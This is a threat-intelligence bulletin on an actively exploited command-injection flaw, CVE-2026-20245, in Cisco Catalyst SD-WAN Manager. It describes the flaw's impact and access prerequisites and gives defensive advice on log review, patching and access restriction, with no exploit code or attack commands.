Active exploitation of unpatched Cisco SD‑WAN Manager flaw

Threat summary

On June 4, 2026, Cisco issued a security advisory on active exploitation of a privilege-escalation zero-day flaw in Cisco Catalyst Software-Defined Wide Area Network (SD-WAN) Manager, after observing targeted exploitation in the wild.

At the time of reporting, the flaw remains unpatched and affects all deployment models, including:

• On-Prem Deployment
• Cisco SD-WAN Cloud-Pro
• Cisco SD-WAN Cloud (Cisco Managed)
• Cisco SD-WAN for Government (FedRAMP)

Cisco has observed exploitation leading to unauthorized configuration changes pushed to SD-WAN edge devices.

Cisco Catalyst SD-WAN Manager (formerly SD-WAN vManage) is the centralized management and orchestration platform for Cisco SD-WAN deployments. It controls configuration, routing, security policies, device onboarding, and monitoring across distributed enterprise networks. Because SD-WAN Manager controls the entire SD-WAN environment, compromise of this system could give an adversary access to edge devices and control over network traffic.

The flaw, tracked as CVE-2026-20245, is a command-injection vulnerability in the SD-WAN Manager command-line interface. It carries a Common Vulnerability Scoring System (CVSS) version 3.1 base score of 7.8, rated as high severity.

For successful exploitation, a threat actor would need to be authenticated with netadmin privileges, which would require valid credentials or exploitation of CVE-2026-20182 or CVE-2026-20127. Cisco reports seeing exploitation only through these access paths. In the limited cases observed, exploitation led to configuration changes being pushed to edge devices.

The flaw enables a threat actor to upload malicious files and execute operating system commands with root privileges. Root-level compromise of the SD-WAN Manager host enables unauthorized configuration changes and potential propagation of malicious configurations to all managed edge devices.

The worst-case scenario involves complete compromise of the SD-WAN management plane, enabling an adversary to alter routing, disable security controls, manipulate virtual private network (VPN) tunnels, and maintain long-term access across the enterprise network.

Analysis

Cisco published indicators of compromise (IOCs) that include specific log entries and command executions that may signal exploitation. Some of these entries can also appear during normal SD-WAN operations, so they must be reviewed in the context of the organization’s expected activity.

Cisco recommends collecting admin-tech files from all SD-WAN control components before any upgrade to preserve evidence for investigation. After collecting logs, teams can review files such as /var/log/scripts.log for entries that match Cisco’s IOCs and assess them against normal operational patterns.

Cisco recommends upgrading to the May 14, 2026 releases fixing CVE-2026-20182, which adversaries used to gain netadmin-level access. Cisco also recommends verifying the configuration of edge devices; in practice, this may involve reviewing routing, templates, and policies to ensure they match the organization’s expected baselines and checking for any changes that were not initiated by administrators.

Limiting access to SD-WAN Manager to dedicated administrative networks, enforcing strong authentication for netadmin accounts, and centralizing log collection across SD-WAN Manager and controllers further reduces exposure. Using Cisco’s IOCs in monitoring tools and regularly checking that SD-WAN configurations match expected settings supports early detection of unauthorized changes.

Stay on top of emerging threats like this.

Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities. 

Sign up